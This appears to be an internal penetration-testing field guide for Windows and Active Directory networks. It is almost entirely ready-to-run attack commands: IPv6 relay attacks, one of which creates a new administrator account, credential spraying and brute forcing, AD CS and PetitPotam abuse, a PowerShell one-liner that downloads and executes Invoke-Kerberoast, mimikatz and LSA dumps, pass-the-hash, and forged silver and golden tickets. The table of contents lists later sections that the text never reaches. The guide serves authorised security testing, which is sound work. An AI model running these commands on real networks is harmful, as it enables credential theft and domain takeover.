Table of Contents

RECONNAISSANCE ...................................................................................... 3
IPV4 NETWORK ACCESS CONTROL (NAC) BYPASS ................................................................ 4
UNAUTHENTICATED A SSET DISCOVERY .................................................................................. 5
UNAUTHENTICATED U SER DISCOVERY ................................................................................... 6
A UTHENTICATED ASSET /USERNAME DISCOVERY ...................................................................... 8
PORT DISCOVERY .......................................................................................................... 10
VULNERABILITY IDENTIFICATION ................................................................. 12
VULNERABILITY SCANNERS ............................................................................................... 13
INITIAL FOOTHOLD .................................................................................... 14
DEFAULT CREDENTIALS .................................................................................................... 15
ACQUIRE CREDENTIALS ................................................................................................... 16
CRACKING HASHES ................................................................................... 21
WORDLISTS AND RULES AND MASKS ................................................................................... 22
WINDOWS VERTICAL PRIVILEGE ESCALATION ............................................. 24
REMOTE USER TO ADMIN ................................................................................................. 25
WINDOWS HORIZONTAL PRIVILEGE ESCALATION ........................................ 27
LOGGED IN U SERS ......................................................................................................... 28
REMOTE MIMIKATZ /LSA DUMPS FROM LOCAL ADMIN ........................................................... 28
PASS T HE HASH (PTH) .................................................................................................... 29
PASS T HE K EY (PTK) ....................................................................................................... 30
PASS T HE TICKET (PTT) .................................................................................................... 32
S ILVER T ICKET ................................................................................................................ 33
GOLDEN T ICKET ............................................................................................................. 35
A UTOMATE L OCAL ADMIN T O DOMAIN ADMIN (NOISY) ....................................................... 37
CREDENTIAL PILLAGING ............................................................................ 38
E XTRACT SAM & CACHED HASHES MANUALLY .................................................................... 39
E XTRACT NTDS. DIT HASHES MANUALLY .............................................................................. 39
E XTRACT NTDS. DIT HASHES (AUTOMATED ) ......................................................................... 39
F IND P LAINTEXT PASSWORDS ............................................................................................ 40
WPA PSK STRING E XTRACTION ........................................................................................ 42
WIRELESS .................................................................................................. 44
WPA/WPA2 HASH CAPTURE WITH U SERS ........................................................................... 45
WPA/WPA2 HASH CAPTURE WITHOUT U SERS (PMKID) ........................................................ 45
WPS ........................................................................................................................... 46
ENTERPRISE W IRELESS ...................................................................................................... 46
EVIL TWIN (SOCIAL ENGINEERING ) .................................................................................... 47
OPEN WIRELESS ............................................................................................................. 47
WEP WIRELESS .............................................................................................................. 47
METHODOLOGY ........................................................................................ 49

Internal Security Assessment: Field Guide Page 1

INTERNAL RUN BOOK FOR MOST W INDOWS NETWORKS (QUICK ACCESS) ................................. 50

Internal Security Assessment: Field Guide Page 2

RECONNAISSANCE

Internal Security Assessment: Field Guide Page 3

IP V 4 N ETWORK A CCESS C ONTROL (NAC) B YPASS

Bypass IPv4 with IPv6

#Most defensive tools exclusively look at IPv4 addresses. Forcing traffic over IPv6 yields a high chance
you will go undetected and be unchallenged.
#Use Metasploit to scan to determine if IPv6 is in use.

auxiliary/scanner/discovery/ipv6_multicast_ping

auxiliary/scanner/discovery/ipv6_neighbor

auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement

SMB server
#Launch a man in the middle attack over IPv6 to SMB share.
https://github.com/fox-it/mitm6.git
https://github.com/SecureAuthCorp/impacket.git

mitm6 -i eth0

smbserver.py SMB_SHARE_NAME path/to/share

Responder
#Launch a man in the middle attack over IPv6.
https://github.com/fox-it/mitm6.git
https://github.com/lgandx/Responder

mitm6 -i eth0

responder -I eth0 -wFv

ntlmrelayx
#Launch a man in the middle attack over IPv6.
https://github.com/fox-it/mitm6.git
https://github.com/SecureAuthCorp/impacket.git

mitm6 -hw icorp-w10 -d internal.corp --ignore-nofqnd

Internal Security Assessment: Field Guide Page 4

ntlmrelayx.py -t ldaps://icorp-dc.internal.corp -wh attacker-wpad --delegate-access

ntlmrelayx.py -wh ATTACKER_IP -t smb://TARGET_IP/ -i

OR

ntlmrelayx.py -ip 0.0.0.0 -t rpc://example.local -c "net user xyzuser xyzpass /add && net localgroup
Administrators xyzuser /add"

U NAUTHENTICATED A SSET D ISCOVERY

#Various techniques to enumerate hosts and services
Private IPv4 Networks

10.0.0.0/8

172.16.0.0/12

192.168.0.0/16

ARP Scan

netdiscover -i eth0

NetBIOS Scan

nbtscan <CIDR>

Limited Port Scan

nmap -sS –p 445,22,80 <CIDR>/12--max-os-tries 1 --max-retries 3 --min-rtt-timeout 100ms --initial-rtt-

timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 --open

Ping Scan

nmap -sP <CIDR>

Internal Security Assessment: Field Guide Page 5

Mass Scan

masscan <CIDR>‐‐top-ports 100

DNS/DC Enumeration

fierce -dns example.com

OR

nmap --script dns-brute example.com

U NAUTHENTICATED U SER D ISCOVERY

NULL Session
https://github.com/byt3bl33d3r/CrackMapExec

https://github.com/trustedsec/ridenum

Crackmapexec smb example.local -u “” -p “” –users

OR

smbclient -N -U "" -L \\example.local

OR

rpcclient -N -U "" -L \\example.local

rpcclient $> enumdomusers

OR

ridenum.py example.local 500 50000 | tee -a ridenum.log

Anonymous Enumeration of AD

ldapsearch -LLL -x -H ldap://test.local -b'' -s base '(objectclass=\*)'

Internal Security Assessment: Field Guide Page 6

Username Enumeration
# Bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication.

nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-

users.realm='test.local',userdb=usernames.txt 10.10.10.1

Internal Security Assessment: Field Guide Page 7

A UTHENTICATED A SSET /U SERNAME D ISCOVERY

Basic User and Host Dump of AD Computers

https://github.com/dirkjanm/ldapdomaindump

ldapdomaindump -u DOMAIN\\notanadmin -p QWERTY <target>

Dump Active Directory Subnet

https://pingcastle.com/download/
https://github.com/NetSPI/goddi.git

1) pingcastle.exe --healthcheck --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --

password <PASSWORD>

2) PingCastle.exe --hc-conso

OR

.\godditest-windows-amd64.exe -username=testuser -password="testpass!" -domain="test.local" -

dc="dc.test.local" -unsafe

AD Dump
https://github.com/fox-it/BloodHound.py

bloodhound-python -u <USERNAME> -p <PASSWORD> -c all

#Computers

cat computers.json|jq -r '.computers[] | .Properties |.name'

#Users

cat users.json|jq -r '.users[] | .Properties |.name'

#Admins

cat users.json|jq -r '.users[] | .Properties |select(.admincount==true) |.name'

https://github.com/byt3bl33d3r/CrackMapExec

Internal Security Assessment: Field Guide Page 8

crackmapexec ldap example.local -u USERNAME -p PASSWORD --admin-count

Computer Asset Dump

apt install ldap-utils

ldapsearch -LLL -H ldap://ad.ourdomain.local -x -D 'OURDOMAIN\user' -w 'thepassword' -b

'dc=ourdomain,dc=local' 'objectClass=computer' name

Local User Dump

https://github.com/byt3bl33d3r/CrackMapExec

crackmapexec smb 192.168.1.0/24 -u USERNAME -p 'PASSWORD' --users

Basic User DNS Dump

https://github.com/dirkjanm/adidnsdump

adidnsdump -u DOMAIN\\notanadmin <target>

Domain Admins Locator

https://github.com/nullbind/Powershellery/blob/master/Stable-ish/Get-SPN/Get-SPN.psm1

Get-SPN -type group -search "Domain Admins" -List yes -DomainController <target>00 -Credential
domainuser | Format-Table –Autosize

Dump Global Address List

https://github.com/dafthack/MailSniper

Get-GlobalAddressList -ExchHostname exchange.example.local -Username [email protected]

-Password Password123

Internal Security Assessment: Field Guide Page 9

Dump Active Directory Usernames
https://github.com/dafthack/MailSniper

Get-ADUsernameFromEWS -Emaillist .\users.txt

P ORT D ISCOVERY

Rapid TCP Port Scan

#Scan for the most common ports of interest. Helpful for quick results on a large scope.

nmap -iL targets.txt --excludefile exclude.txt --privileged -n -PE -PS21-23,25,53,80,110-

111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 --osscan-guess --max-os-tries 1 --max-
retries 3 --min-rtt-timeout 100ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-
rate 15000 --open --stats-every 10s -oX /tmp/nmap.xml

OR

masscan -iL targets.txt ‐‐top-ports 100 -oX /tmp/nmap.xml

Default TCP Port Scan

#Scan for the most common/default ports. Slower results on a large scope.

nmap -iL targets.txt --excludefile exclude.txt --osscan-guess --max-os-tries 1 --max-retries 3 --min-rtt-

timeout 100ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 --open -
-stats-every 10s -oX /tmp/nmap.xml

Rapid TCP/UDP Port Scan

#Scan for the most common ports of interest. Helpful for quick results on a large scope.

nmap -iL targets.txt --excludefile exclude.txt --privileged -n -PE -PS21-23,25,53,80,110-

111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 -PU53,67-69,123,135,137-139,161-
162,445,500,514,520,631,1434,1900,4500,5353,49152 --osscan-guess --max-os-tries 1 --max-retries 3 --
min-rtt-timeout 100ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000
--open --stats-every 10s -oX /tmp/nmap.xml

Internal Security Assessment: Field Guide Page 10

Extensive TCP Port Scan
#Scan for the most common ports of interest. Very slow on a large scope.

nmap -iL targets.txt –p- --excludefile exclude.txt --osscan-guess --max-os-tries 1 --max-retries 3 --min-
rtt-timeout 100ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 --
open --stats-every 10s -oX /tmp/nmap.xml

Internal Security Assessment: Field Guide Page 11

VULNERABILITY IDENTIFICATION

Internal Security Assessment: Field Guide Page 12

V ULNERABILITY S CANNERS
Invest in a decent vulnerability scanner for internal assessments. This can help automate identification of
low hanging fruit.

Paid Scanning Tools Function

Tenable Nessus Infrastructure Vulnerability Scanner, Light

Application Analysis

Rapid7 Nexpose Infrastructure Vulnerability Scanner, Light

Application Analysis

Saint Infrastructure Vulnerability Scanner, Light

Application Analysis

BurpSuite Heavy, Manual Web Application Analysis

Acunetix Automated Web Application Analysis

Netsparker Automated Web Application Analysis

Free Scanning Tools Function

OpenVAS Infrastructure Vulnerability Scanner, Light

Application Analysis

Wapiti Web Application Analysis only

NMAP Scripts Infrastructure Vulnerability Scanner, Light

Application Analysis

Metasploit Auxiliary Modules Infrastructure Vulnerability Scanner, Light

Application Analysis

Nuclei Crowdsourced Infrastructure Vulnerability

Scanner, Application Analysis

Internal Security Assessment: Field Guide Page 13

INITIAL FOOTHOLD

Internal Security Assessment: Field Guide Page 14

D EFAULT C REDENTIALS
#All of the tools below help to look for default credential usage. No one tool will find all the default
credentials.
NMAP Default Creds

nmap --script http-default-accounts -p

80,81,280,591,593,832,981,1311,2480,4444,4445,4567,5000,5104,5800,7000,7001,7002,8008,8042,808
8,8222,8243,8280,8281,8333,8530,8531,8887,8888,9080,9981,12443,12043,12046,16080,18091,18092,
8080,443,8443,8081,9090,9091,8000,10443,22,21,23 –iL targets.txt –oX /tmp/nmap_output.xml

Nuclei Cred Scan

#HTTP credential scanner.
https://github.com/projectdiscovery/nuclei.git

nuclei -l urls.txt -t /root/nuclei-templates/default-logins

Changeme Cred Scan

#HTTP scanner by default, has support for SSH, SSH keys, and SNMP.
https://github.com/ztgrace/changeme.git

changeme.py nmap_output.xml

Manual Login Identification

https://github.com/projectdiscovery/httpx

cat hosts.txt | httpx –threads 500 -ms "assword"

EyeWitness Active Cred Scan

#HTTP credential scanner.
https://github.com/FortyNorthSecurity/EyeWitness.git

Internal Security Assessment: Field Guide Page 15

Eyewitness -x default_creds.xml --active-scan --web

BruteSpray Cred Scan

#Imports an nmap XML file, and scans for the below supported services.
• ssh, ftp, telnet, vnc, mssql, mysql, postgresql, rsh, imap, nntp, pcanywhere, pop3, rexec, rlogin,
smbnt, smtp, svn, vmauthd, snmp
https://github.com/x90skysn3k/brutespray.git

python brutespray.py --file nmap_output.xml --threads 5 --hosts 5

Brutex Cred Scan

#Automatically brute force all logins running on a target.
https://github.com/1N3/BruteX.git

brutex <target>

Metasploit Cred Scans

#Miscellaneous scanner modules for specific services and goals.

use auxiliary/scanner/*

A CQUIRE C REDENTIALS

AD CS Abuse
https://github.com/topotam/PetitPotam

https://github.com/dirkjanm/PKINITtools

python3 Petitpotam.py <attacking machine’s IP> <target Domain Controller’s IP>

cat base64 | base64 -d > certificate.pfx

python3 gettgtpkinit.py example.local/DC01NAME\$ -cert-pfx certificate.pfx out.ccache

Internal Security Assessment: Field Guide Page 16

KRB5CCNAME=out.ccache python3 getnthash.py example.local/DC01\$ -key e19fd...blah

crackmapexec ldap DC01.example.local -u DC01\$ -H 6e02...truncated --admin-count

KRB5CCNAME=out.ccache python3 gets4uticket.py

kerberos+ccache://domain.local\\DC01\$:[email protected]
cifs/[email protected] [email protected] Administrator.ccache -v

Export KRB5CCNAME=’/path/to/Administrator.ccache’

secretsdump.py domain.local/[email protected] -k -no-pass

SMB relay/IPv6 DNS poison

https://github.com/fox-it/mitm6.git
https://github.com/SecureAuthCorp/impacket.git

crackmapexec smb 192.168.1.0/24 --gen-relay-list relaylistOutputFilename.txt

mitm6 -i eth0 -d example.local

ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relay.txt -smb2support

Mitm6, ntlmrelayx and RBCD

https://github.com/fox-it/mitm6.git
https://github.com/SecureAuthCorp/impacket.git

mitm6 -hw icorp-w10 -d internal.corp --ignore-nofqnd

ntlmrelayx.py -t ldaps://icorp-dc.internal.corp -wh attacker-wpad --delegate-access

getST.py -spn cifs/example.local example.local/NEW_PC_NAME\$ - impersonate admin

export KRB5CCNAME=admin.ccache

secretsdump.py -k -no-pass admin.ccache

SCF Upload
#SMB Share File attack.

Internal Security Assessment: Field Guide Page 17

Create an SCF file with the following:

[Shell] Command=2 IconFile=\\<attacker IP>\share\test.ico

[Taskbar] Command=ToggleDesktop

Upload to the share.

responder -I eth0 -v

LLMNR/NBTNS/mDNS poisoning – Capture Hashes

responder -I eth0 –rPv

Find Hosts with SMB Signing Disabled

crackmapexec smb <CIDR> --gen-relay-list smbrelay.txt

LLMNR/NBTNS/mDNS poisoning – Relay Hashes

#Configure Responder to redirect user auth. In responder.conf, set SMB,HTTP and HTTPS to OFF in
the list of servers to start, then:

responder -I eth0 –v

ntlmrelayx.py -tf smbrelay.txt

Devices with LDAP enabled

Finding printers
https://github.com/rvrsh3ll/SharpPrinter
https://github.com/percx/Praeda.git
Manual Exploit

Search for default credentials on printers with LDAP enabled

netcat -l -vv -p 444

Internal Security Assessment: Field Guide Page 18

Initiate an LDAP query.

Seth MiTM RDP Connections

https://github.com/SySS-Research/Seth

seth.sh <INTERFACE> <ATTACKER IP> <VICTIM IP> <GATEWAY IP|HOST IP>

Resource-based Constrained Delegation

https://github.com/SecureAuthCorp/impacket.git

mitm6 -i eth0-d <domain>

ntlmrelayx.py -t ldaps://<DomainController> -wh attacker-wpad --delegate-access

export KRB5CCNAME=<TGS_ccache_file>

secretsdump.py –k –no-pass <VictimPC>

Password Spray
Collect usernames from the internet.
o Theharvester - https://github.com/laramies/theHarvester.git
o Linkedint - https://github.com/mdsecactivebreach/LinkedInt
o Raven - https://github.com/0x09AL/raven
o Hunter.io
o Dehashed.com - $4.49 purchase required
o Scylla - https://scylla.sh/
o Authenticated Asset/Username Discovery Section
https://github.com/Greenwolf/Spray.git

spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod>

<LockoutPeriodInMinutes> <DOMAIN>

Crackmapexec

crackmapexec <protocol> <target(s)> -u username1 -p password1 password2

crackmapexec <protocol> <target(s)> -u username1 username2 -p password1

Internal Security Assessment: Field Guide Page 19

crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords

crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes

https://github.com/ReverendThing/Carnivore
#For MS Cloud services only

Carnivore.exe

Internal Security Assessment: Field Guide Page 20

CRACKING HASHES

Internal Security Assessment: Field Guide Page 21

W ORDLISTS AND R ULES AND M ASKS

Wordlists
• https://mega.nz/#!aqRS2CJZ!TjbvyNcrXxMXNNRiUOIsz91NrzVuqm_r-Z_CZ_udD5Q
• https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm
• https://github.com/danielmiessler/SecLists/tree/master/Passwords
• https://hashes.org/leaks.php

Create Company Specific Wordlist

#Businesses often share a common password related to the business.
https://github.com/digininja/CeWL

cewl -d 3 -m 4 -w /tmp/cewl-wordlist.txt http://domain.com

#Businesses often share a common password related to the business.

https://gist.github.com/lanmaster53/a0d3523279f3d1efdfe6d9dfc4da0d4a

Usage:

1. Point Burp Suite to Jython in the Extender > Options tab.

2. Install this extension manually in the Extender > Extensions tab.

3. Select an option for extension output (File, Console or UI).

4. Right-click on any element in the Target tab's hierarchical sitemap.

5. Select the Extensions > Create wordlist context menu item.

Common Hashes to Crack (Hashcat)

900 | MD4
0 | MD5
3000 | LM
1000 | NTLM
1100 | Domain Cached Credentials (DCC), MS Cache
2100 | Domain Cached Credentials 2 (DCC2), MS Cache 2

Internal Security Assessment: Field Guide Page 22

 5500 | NetNTLMv1
5600 | NetNTLMv2
2500 | WPA/WPA2
13100 | Kerberos 5 TGS-REP etype 23 (Kerberoast)
18200| Kerberos 5 AS-REP etype 23 (ASREPRoast)

Convert MScach2 from crackmapexec to Hashcat Format

cat /root/.cme/logs/*.cached |cut -d : -f2- > mscach2_hashes.txt

Wordlist/No rules

hashcat -m 5600 -O -w 3 admin_hash.txt fav_wordlist.txt

Wordlist W/rules

hashcat -m 5600 -O -w 3 admin_hash.txt fav_wordlist.txt -r /usr/share/hashcat/rules/d3ad0ne.rule

Bruteforce No Special Char

hashcat -m 5600 -O -w 3 admin_hash.txt -a3

Crack IPMI

hashcat --username -m 7300 -O -w 3 admin_hash.txt fav_wordlist.txt -r

/usr/share/hashcat/rules/d3ad0ne.rule

Combination Attack

hashcat -m 0 -a 1 hash.txt dict1.txt dict2.txt

Internal Security Assessment: Field Guide Page 23

WINDOWS VERTICAL PRIVILEGE
ESCALATION

Internal Security Assessment: Field Guide Page 24

R EMOTE U SER TO A DMIN

AD CS Abuse
Certipy

certipy 'example/john:[email protected]' auto

ASREPRoast
Crackmapexec

crackmapexec ldap <Domain Controller> -u users.txt -p '' --asreproast output.txt

crackmapexec ldap <Domain Controller> -u username -p pass --asreproast output.txt

Kerberoast
https://github.com/SecureAuthCorp/impacket.git (Linux)

GetUserSPNs.py –request domain.info/notanadmin

crackmapexec ldap <Domain Controller> -u username -p pass --kerberoasting output.txt

https://github.com/GhostPack/Rubeus.git (Windows)

.\Rubeus.exe kerberoast /outfile:

PowerShell

$webreq =
[System.Net.WebRequest]::Create(‘https://raw.githubusercontent.com/EmpireProject/Empire/master/dat
a/module_source/credentials/Invoke-Kerberoast.ps1’); $resp=$webreq.GetResponse();
$respstream=$resp.GetResponseStream(); $reader=[System.IO.StreamReader]::new($respstream);
$content=$reader.ReadToEnd(); IEX($content); Invoke-Kerberoast -OutputFormat HashCat|Select-
Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt

Extract GPP Credentials

Internal Security Assessment: Field Guide Page 25

https://github.com/byt3bl33d3r/CrackMapExec

crackmapexec smb DC_IP_ADDR –u notanadmin –p Password123 –d domain –M gpp_password

MS Exchange – Domain Escalation

https://github.com/dirkjanm/PrivExchange

ntlmrelayx.py -t ldap://dc.example.local --escalate-user notanadmin

python privexchange.py -ah attacker.example.local exchange.example.local -u notanadmin -d

example.local

secretsdump.py example.local/[email protected] –just-dc

Escalate via MSSQL

1) crackmapexec mssql 10.10.10.1 -u username -p password –local-auth -M mssql_priv

2) crackmapexec mssql 10.10.10.1 -u username -p password –local-auth -M mssql_priv -o “ACTION-

privexec”

3) crackmapexec mssql 10.10.10.1 -u username -p password –local-auth -x whoami

4) crackmapexec mssql 10.10.10.1 -u username -p password –local-auth -o “ACTION-rollback”

Active Directory Low Hanging Fruit Check

https://www.pingcastle.com/download/

pingcastle.exe –healthcheck –server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --

password <PASSWORD>

Internal Security Assessment: Field Guide Page 26

WINDOWS HORIZONTAL PRIVILEGE
ESCALATION

Internal Security Assessment: Field Guide Page 27

L OGGED I N U SERS

Crackmapexec

crackmapexec smb 192.168.1.0/24 -u username -p Password123 –d domain --loggedon-users

Metasploit

use auxiliary/scanner/smb/psexec_loggedin_users

Set: RHOSTS, SMBUser, SMBPass, SMBDomain, run

Pingcastle

pingcastle.exe --graph --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --password

<PASSWORD>

Bloodhound
https://github.com/BloodHoundAD/BloodHound

neo4j start

python bloodhound.py -u <USERNAME> -p <PASSWORD> -d <DOMAIN_NAME> -dc

<DOMAIN_CONTROLLER_HOSTNAME>

Bloodhound Python
https://github.com/fox-it/BloodHound.py.git

python3 bloodhound.py -d <domain> -u username -p password -c All

Bloodhound – LSASSY

crackmapexec smb 10.0.0.0/24 -d adsec.local -u Administrator -p Passw0rd -M lsassy -o

BLOODHOUND=True NEO4JPASS=bloodhound

R EMOTE M IMIKATZ /LSA D UMPS F ROM L OCAL A DMIN

Dump LSA secrets

Internal Security Assessment: Field Guide Page 28

Crackmapexec
https://github.com/byt3bl33d3r/CrackMapExec

crackmapexec smb targets.txt -u localadmin -p Password123 –d domain --lsa

Metasploit

use auxiliary/scanner/smb/impacket/secretsdump

Set: RHOSTS, SMBUser, SMBPass, SMBDomain, run

LSASSY

crackmapexec smb <target> -u administrator -p pass -M lsassy

Dump with Mimikatz

Crackmapexec

crackmapexec smb <target> -u admin -p Password123 -M mimikatz

Metasploit

exploit/windows/smb/psexec_psh

load kiwi

creds_all

Set: RHOSTS, SMBUser, SMBPass, SMBDomain, run

CredCrack
https://github.com/gojhonny/CredCrack

credcrack.py -f targets.txt -d domain -u localadmin -l <target>

P ASS T HE H ASH (PTH)

Internal Security Assessment: Field Guide Page 29

Dump SAM file (1)
Crackmapexec

crackmapexec smb targets.txt -u localadmin -p Password123 –d domain –sam

Metasploit

use exploit/windows/smb/psexec > load kiwi > creds_all

Set: RHOST, SMBUser, SMBPass, SMBdomain, run

Pass the Hash (2)

Crackmapexec

crackmapexec smb targets.txt -u localadmin -H 8846F7EAEE8FB117AD06BDD830B7586C --local-

auth

Metasploit

use exploit/windows/smb/psexec

Set: RHOST, SMBUser, SMBPass LM:NTLM, run

xfreerdp

xfreerdp /u:administrator /d:test.local /pth:7337532fd3bf3abfaef5a9b5bb05a9d8 /v:192.168.1.101

/size:800x600

P ASS T HE K EY (PTK)

Request The TGT via Linux (1)

Impacket
https://github.com/SecureAuthCorp/impacket.git
#Request the TGT with hash

Internal Security Assessment: Field Guide Page 30

python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>

OR

#Request the TGT with aesKey

python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>

OR

#Request the TGT with password

python getTGT.py <domain_name>/<user_name>:[password]

Pop Shell via Linux (2)

#Set the TGT from Impacket

export KRB5CCNAME=<TGS_ccache_file>

#Execute remote commands with psexec or smbexec or wmiexec

python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Request The TGT via Windows (1)

https://github.com/GhostPack/Rubeus.git
#Request the TGT with hash

.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt

Pop Shell via Windows (2)

Internal Security Assessment: Field Guide Page 31

#Execute a cmd on the remote machine

.\PsExec.exe -accepteula \\<remote_hostname> cmd

P ASS T HE T ICKET (PTT)

Harvest tickets on Linux host (1)

grep default_ccache_name /etc/krb5.conf

OR

grep default_ccache_name /tmp/krb5cc_%{uid}

OR

#If user is root Tickey will inject into other user processes. Must be in a reachable folder.

https://github.com/TarlogicSecurity/tickey.git

cp tickey /tmp/tickey && /tmp/tickey -i

Use Ticket via Linux (2)

#Set the TGT from Impacket

export KRB5CCNAME=<TGS_ccache_file>

#Execute remote commands with psexec or smbexec or wmiexec

python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Internal Security Assessment: Field Guide Page 32

Harvest tickets from Windows (1)
Mimikatz
https://github.com/gentilkiwi/mimikatz

mimikatz # sekurlsa::tickets /export

Rubeus in PowerShell
https://github.com/GhostPack/Rubeus.git

.\Rubeus dump

Inject Ticket via Windows (2)

Mimikatz

mimikatz # kerberos::ptt <ticket_kirbi_file>

Rubeus

.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

PsExec

.\PsExec.exe -accepteula \\<remote_hostname> cmd

S ILVER T ICKET

Request The TGT via Linux (1)

https://github.com/SecureAuthCorp/impacket.git
#Generate the TGS with NTLM via impacket

python ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn

<service_spn> <user_name>

#Generate the TGS with AES key via impacket

Internal Security Assessment: Field Guide Page 33

python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn
<service_spn> <user_name>

Set Ticket via Linux (2)

#Use the TGT with Impacket

export KRB5CCNAME=<TGS_ccache_file>

#Execute remote commands with psexec or smbexec or wmiexec

python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Request The TGT via Windows (1)

https://github.com/gentilkiwi/mimikatz
#Generate the TGS with NTLM via Mimikatz

mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<ntlm_hash>

/user:<user_name> /service:<service_name> /target:<service_machine_hostname>

#Generate the TGS with AES key via Mimikatz

mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key>

/user:<user_name> /service:<service_name> /target:<service_machine_hostname>

OR

mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key>

/user:<user_name> /service:<service_name> /target:<service_machine_hostname>

Set Ticket via Windows (2)

#Use the TGT with Mimikatz

Internal Security Assessment: Field Guide Page 34

mimikatz # kerberos::ptt <ticket_kirbi_file>

#Use the TGT with Rubeus

.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

#Execute remote commands with psexec

.\PsExec.exe -accepteula \\<remote_hostname> cmd

G OLDEN T ICKET
Request The TGT via Linux (1)
https://github.com/SecureAuthCorp/impacket.git
#Generate the TGS with NTLM via impacket

python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name>

<user_name>

#Generate the TGS with AES key via impacket

python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name>

<user_name>

Set Ticket via Linux (2)

#Use the TGT with Impacket

export KRB5CCNAME=<TGS_ccache_file>

#Execute remote commands with psexec or smbexec or wmiexec

python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

Internal Security Assessment: Field Guide Page 35

python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Request The TGT via Windows (1)

https://github.com/gentilkiwi/mimikatz
#Generate the TGS with NTLM via Mimikatz

mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<krbtgt_ntlm_hash>

/user:<user_name>

#Generate the TGS with AES key via Mimikatz

mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key>

/user:<user_name>

OR

mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key>

/user:<user_name>

Set Ticket via Windows (2)

#Use the TGT with Mimikatz

mimikatz # kerberos::ptt <ticket_kirbi_file>

#Use the TGT with Rubeus

.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

#Execute remote commands with psexec

.\PsExec.exe -accepteula \\<remote_hostname> cmd

Internal Security Assessment: Field Guide Page 36

